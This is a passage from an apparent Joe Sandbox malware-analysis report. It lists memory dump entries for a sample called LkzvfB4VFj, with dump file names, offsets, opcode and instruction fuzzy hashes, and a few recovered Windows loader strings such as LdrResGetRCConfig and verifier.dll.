                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                   • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$$
                                                  • API String ID: 3446177414-233714265
                                                  • Opcode ID: 99126630fbaa61a432048e6154dce070fbb12d3f55898aa79e4a809b86ce036a
                                                  • Instruction ID: 98a2e5b30e1ba465a41a9664d4ce5a08a01a10547169555237db9a5cdde2d176
                                                  • Opcode Fuzzy Hash: 99126630fbaa61a432048e6154dce070fbb12d3f55898aa79e4a809b86ce036a
                                                  • Instruction Fuzzy Hash: 7661BF7AA00749CBEB21DFA4C580B9DB7B2FF44704F104C69D505AF690CB75A981CF92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                   • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                  • API String ID: 0-118005554
                                                  • Opcode ID: c1831b6d4fcca806b441d429b5c9027c90f768e8ad3ed0c9f44fec0728d2346d
                                                  • Instruction ID: bbfede972bca0e04aacc89b047e56acdbbb2f8191c71e104cf08350ff40018f6
                                                  • Opcode Fuzzy Hash: c1831b6d4fcca806b441d429b5c9027c90f768e8ad3ed0c9f44fec0728d2346d
                                                  • Instruction Fuzzy Hash: D631F0B62087409FE309CB69D846B1ABBF4EF84714F0408A9FC548B3D0EB31D949CB92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                   • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .Local\$@
                                                  • API String ID: 0-380025441
                                                  • Opcode ID: 80c39a1b19b760212b36b8ecb11fc4e9f813a7a7e376aae0fcca13b162f17434
                                                  • Instruction ID: 1831306f015621a6cc4e1feebfd37016540f6869e6f494def65dee193fa9c5ec
                                                  • Opcode Fuzzy Hash: 80c39a1b19b760212b36b8ecb11fc4e9f813a7a7e376aae0fcca13b162f17434
                                                  • Instruction Fuzzy Hash: E03160B65093029FD711CF28C880A9BFBF8FB85694F00096EF99683290D634DD088BD2
                                                  Strings
                                                  • RtlpInitializeAssemblyStorageMap, xrefs: 3600289A
                                                  • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3600289F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                   • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                  • API String ID: 0-2653619699
                                                  • Opcode ID: 33e863b1fa03d4720f3e586fa0195d95292fd6cf8c346e9408c703a03a92bc15
                                                  • Instruction ID: 141f32c21dae5ccda695cf38279d19c0a1cb9d51cefd2149a4d443accf5eeb42
                                                  • Opcode Fuzzy Hash: 33e863b1fa03d4720f3e586fa0195d95292fd6cf8c346e9408c703a03a92bc15
                                                  • Instruction Fuzzy Hash: A8110676B05305ABF7158A49CD81F5E7BE8DB84790F1088F9B9049B284DAB4CD008BA4
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                   • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 607d65288004b68f4ce910ac02ae8619f742b6bf9b60afd6083c2fe21f9231b0
                                                  • Instruction ID: 8af639a43c715785a99b8ed3ac91f8e84a8cff77c9d4a807a344da8cafbb27af
                                                  • Opcode Fuzzy Hash: 607d65288004b68f4ce910ac02ae8619f742b6bf9b60afd6083c2fe21f9231b0
                                                  • Instruction Fuzzy Hash: 8922E278A067608FE714CF2AC052376BBE1BF45346F6484D9E8C69F285E775D482CB60
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                   • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: ada3364ad46803d92ada850aa4ab971f900a49cf1b81e21a990295653e59cc1b
                                                  • Instruction ID: d2485553395a312c44e6c59ef6185bf86372c2457007d4806c9985573904c667
                                                  • Opcode Fuzzy Hash: ada3364ad46803d92ada850aa4ab971f900a49cf1b81e21a990295653e59cc1b
                                                  • Instruction Fuzzy Hash: 4FB100B56093809FE354CF28C480A5AFBF1BB88344F544D6EE899CB352D771E885CB82
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                   • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 44ce19a80090e1f6a73cd9ef2736167026cb00e50c92f42db88898c475418034
                                                  • Instruction ID: a4e371063f2946b6918d770bf4ac2a2af1f9494aef71513000a292385f979bce
                                                  • Opcode Fuzzy Hash: 44ce19a80090e1f6a73cd9ef2736167026cb00e50c92f42db88898c475418034
                                                  • Instruction Fuzzy Hash: AE813DB5A00319ABEB12DFE5CC85E9FFBF8EF49750F140569E515AB290DA70E900CB90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                   • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 437eafb405ce52565a768a53f9bc664392b103188f3c5a41222f79d1ed82c888
                                                  • Instruction ID: e937cc578756856911c33b337d62347f916ca274d7acbd92866eba03f865f3b9
                                                  • Opcode Fuzzy Hash: 437eafb405ce52565a768a53f9bc664392b103188f3c5a41222f79d1ed82c888
                                                  • Instruction Fuzzy Hash: F5618579B01746AFEB0CDF78C480A9DFBB6BF45344F24896AD519A7300DB30A9518F91
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                   • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 4d625eac9c2809f7760fdd39a45f41f937d92f7d2f638bfbc91617af63822bf8
                                                  • Instruction ID: beb3da653e88b285a6ec01196c621bfbb88c15a9c7f1b94e48888212e0257bab
                                                  • Opcode Fuzzy Hash: 4d625eac9c2809f7760fdd39a45f41f937d92f7d2f638bfbc91617af63822bf8
                                                  • Instruction Fuzzy Hash: 0731FF726002089FC711DF14C881E5A77AAFF45360F114A69ED659F3A2CB31ED42CBD0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                   • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 0c8b0aa378c1f84e6991f38bdb20ff5769e9a746f06614d833abd532ab2bbd27
                                                  • Instruction ID: f7cab6926ab977fa1a405438a866d5fec7630776996a1caea174d98601527977
                                                  • Opcode Fuzzy Hash: 0c8b0aa378c1f84e6991f38bdb20ff5769e9a746f06614d833abd532ab2bbd27
                                                  • Instruction Fuzzy Hash: CD318B3A715A05FFE7499B24CE80E99BBAAFF84254F405855E80187E60DB71E930CB81
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 446a2d347f8c01b026bb27f841436ecd354266d365fa3285af35aa05e684fd89
                                                  • Instruction ID: 04d635fa93b897302a6b369cd41bc1a727a3658622e02508b7f9df150ff40971
                                                  • Opcode Fuzzy Hash: 446a2d347f8c01b026bb27f841436ecd354266d365fa3285af35aa05e684fd89
                                                  • Instruction Fuzzy Hash: A321F036205A459FE725DF14C984F9ABFB6FF84B11F410899E8464B681CB70EC58CF92
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: eb0908d5322f44d78a6782bcbdd0c5f8faf3077693c86adfa3c9d2f9b48fa7ae
                                                  • Instruction ID: 0632f062bd2f40017a92d19d96bb12a76752b97facdfbb28d8d9bd43ab0cde28
                                                  • Opcode Fuzzy Hash: eb0908d5322f44d78a6782bcbdd0c5f8faf3077693c86adfa3c9d2f9b48fa7ae
                                                  • Instruction Fuzzy Hash: 3F21E4B6704388DFE702DF98C940B9DBBF9FF45744F144899E9009B291CB798900CB22
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 1bf6700c086a4bbb01578b8e3f1eb07204cc57ac659a30746b6bf927af388369
                                                  • Instruction ID: f942d6945b20b620fe44f44e8fda2257cb999a72c5fba31d77b2be72895af044
                                                  • Opcode Fuzzy Hash: 1bf6700c086a4bbb01578b8e3f1eb07204cc57ac659a30746b6bf927af388369
                                                  • Instruction Fuzzy Hash: 08F02E32204704ABD731DB09CD04F8BBBFEEF84B00F04091CE94293490C7A0F909CA60
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b2609bb69b08a978478f22bf7f42c8a92f84c7b57da1dccdce15fc070cacc7f3
                                                  • Instruction ID: 99a0d708990eeb8f6ee325df8f1138ed5b89e1ef57f4737996d8290fd4d3649a
                                                  • Opcode Fuzzy Hash: b2609bb69b08a978478f22bf7f42c8a92f84c7b57da1dccdce15fc070cacc7f3
                                                  • Instruction Fuzzy Hash: 95E06572B14208ABEB04DB58D846B4A77EDEB88798F1400A9F50BD7140D660DD01D690
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680565927.0000000035CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35ce0000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: F
                                                  • API String ID: 0-1304234792
                                                  • Opcode ID: 49e8d6f96d1f0cf1e23c76e77799b8e2d423a4c35a06133abb56a548769ba3b7
                                                  • Instruction ID: 8bea502701765b0e0139d95e0e3463405ea88cfe70d3b3a16cc4769ce9f2389d
                                                  • Opcode Fuzzy Hash: 49e8d6f96d1f0cf1e23c76e77799b8e2d423a4c35a06133abb56a548769ba3b7
                                                  • Instruction Fuzzy Hash: 6B81D33060CB848FD7A5DB2DC490B6ABBE2BFD8344F504D6DA1DAC3261DA35D941CB52
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93668651185.0000000005C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_5c80000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: F
                                                  • API String ID: 0-1304234792
                                                  • Opcode ID: 49e8d6f96d1f0cf1e23c76e77799b8e2d423a4c35a06133abb56a548769ba3b7
                                                  • Instruction ID: 5e3fcf15e329888bb6e8d9b70e45b28ca1aab9a9982e70066c3d5993c589caaa
                                                  • Opcode Fuzzy Hash: 49e8d6f96d1f0cf1e23c76e77799b8e2d423a4c35a06133abb56a548769ba3b7
                                                  • Instruction Fuzzy Hash: F681C53060C7848FDBA9DB2DC458B6ABBE2BBC9704F544D6DA1DAC3261DB34D941CB42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680401460.0000000035C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 35C80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35c80000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: F
                                                  • API String ID: 0-1304234792
                                                  • Opcode ID: 49e8d6f96d1f0cf1e23c76e77799b8e2d423a4c35a06133abb56a548769ba3b7
                                                  • Instruction ID: 7e997205ca45403e1fd8181287e384fc59b492ae5a2868fccd18f69a3bd5e4a0
                                                  • Opcode Fuzzy Hash: 49e8d6f96d1f0cf1e23c76e77799b8e2d423a4c35a06133abb56a548769ba3b7
                                                  • Instruction Fuzzy Hash: 8D81B43460CB848FD7A9DB2DC454BAABBE2BFD9704F50496DA1DAC3261DB34D841CB42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                  • Instruction ID: 054c64ec092b67c73646a28bdcfc7e3ee88740575c6b614404abee4e81a0a935
                                                  • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                  • Instruction Fuzzy Hash: 2B618CBAD0461DABEB15CFA5C940BDEBBF9FF84750F110919E810B72A0DB758A01CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                  • Instruction ID: f29d95151236f64d04f1870493e39f272588c594d8c4b1a12e69a37f335665d6
                                                  • Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                  • Instruction Fuzzy Hash: E151FAB6A04305AFE3228F15C841F6BBBF8FB84754F004969FA4097291DBB4ED04CB92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: verifier.dll
                                                  • API String ID: 0-3265496382
                                                  • Opcode ID: edd72f590905a572c6ac319880c0e8ad6fda127a9dd92882f02c2e5f473bd009
                                                  • Instruction ID: db844707ee24823a0c4bebbe90a1f72f8efb9c03553c5cf578805ff93bfa96e1
                                                  • Opcode Fuzzy Hash: edd72f590905a572c6ac319880c0e8ad6fda127a9dd92882f02c2e5f473bd009
                                                  • Instruction Fuzzy Hash: 113118BDB103019FE714CF59D852B267BE5EB89354F9044AAE686EF381EA318C81C790
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #
                                                  • API String ID: 0-1885708031
                                                  • Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                  • Instruction ID: e442bcb4c3cfe7dc128c17ff49d913d1888b9e6f93919c1c8999e87267cef72d
                                                  • Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                  • Instruction Fuzzy Hash: 7C41A0B6A04616EBEF15CF88C480BBEBBB5FF44741F4048EEE845A7240DB749941CBA1
                                                  Strings
                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 35F8FFF8
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                  • API String ID: 0-996340685
                                                  • Opcode ID: 24a35867623173c397b54bb0e56b326194d0d8b910fe9999c542cfd85d1b0046
                                                  • Instruction ID: 091def7d9572e31f5c53057f8448c19775b0618473cecca3995a5d6c23a3bc7a
                                                  • Opcode Fuzzy Hash: 24a35867623173c397b54bb0e56b326194d0d8b910fe9999c542cfd85d1b0046
                                                  • Instruction Fuzzy Hash: 3E415E75A00B4A9FE728DFA4C440AEBB7F9BF49340F004D2ED5AAC3240E774A645CB95
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Flst
                                                  • API String ID: 0-2374792617
                                                  • Opcode ID: 4d73e0496facddaf46025b5faf53f4c95b3c1904a441fb1339c2c0e85d771cf1
                                                  • Instruction ID: bbc36d312c417580daf6d11cbfed9e6e0595599f7a8507326d0acb32e6b104e0
                                                  • Opcode Fuzzy Hash: 4d73e0496facddaf46025b5faf53f4c95b3c1904a441fb1339c2c0e85d771cf1
                                                  • Instruction Fuzzy Hash: C841B8B1608302DFE305CF18C080A16FBE5EF89754F5089AEE459CB281DB71C846CB92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: 3(w3(w
                                                  • API String ID: 3446177414-3452111426
                                                  • Opcode ID: a7b02732a7a01b3bcf60898f921acc543c7ba425c9eae3d583fcb4693a19fbb5
                                                  • Instruction ID: 48d3970c2e4d5bb385d72c6afdacbe9ee8fd5058ab5482e66b45a8e53fba8714
                                                  • Opcode Fuzzy Hash: a7b02732a7a01b3bcf60898f921acc543c7ba425c9eae3d583fcb4693a19fbb5
                                                  • Instruction Fuzzy Hash: 7021D076A00B18AFC722CF68C940B1E7BB5FB84B50F120C69AA19AB740DB70DD01CBD0
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 99f8c387c1c4b31e4405352e317ff4ade597332f127f70b4e229fdd22f778aa8
                                                  • Instruction ID: 2280f5a29091c2769fe23c5feed34134376c5ca65e8c81001e7709f552099c56
                                                  • Opcode Fuzzy Hash: 99f8c387c1c4b31e4405352e317ff4ade597332f127f70b4e229fdd22f778aa8
                                                  • Instruction Fuzzy Hash: 4442C475A056568FDB08CF59C8809AEF7B6FF88354B14895DD952AB380DB34EC42CF90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 424ae38fb40daabcd791ebea6389b5f9e43d86d5efcf830fe3cace9ce2984000
                                                  • Instruction ID: 01906a993bb2ad6d276fb71d3a2f7a5fda630f346183082de1ccc5c432fc01fa
                                                  • Opcode Fuzzy Hash: 424ae38fb40daabcd791ebea6389b5f9e43d86d5efcf830fe3cace9ce2984000
                                                  • Instruction Fuzzy Hash: B232D5B6E00219DFDF14CF99C880BAEBBB5FF44744F180569E806AB390E7B59911CB91
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6df46805e7f4a2d8465881fada1b68c1dfbbe66ed6b7d338e34888886ce44b1c
                                                  • Instruction ID: 5029c1b1ded57fb2a6bdd333361b7ed68a460ef2f9360769a796d40f5a1b5f60
                                                  • Opcode Fuzzy Hash: 6df46805e7f4a2d8465881fada1b68c1dfbbe66ed6b7d338e34888886ce44b1c
                                                  • Instruction Fuzzy Hash: A8423DB5E002198FEB24CF69C881BADBBF5BF48315F5481D9E849AB241D7349D85CF60
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dfb5e90caf2e51959875b92ee5c1880304f741e6687393d119c75847aba2c8e9
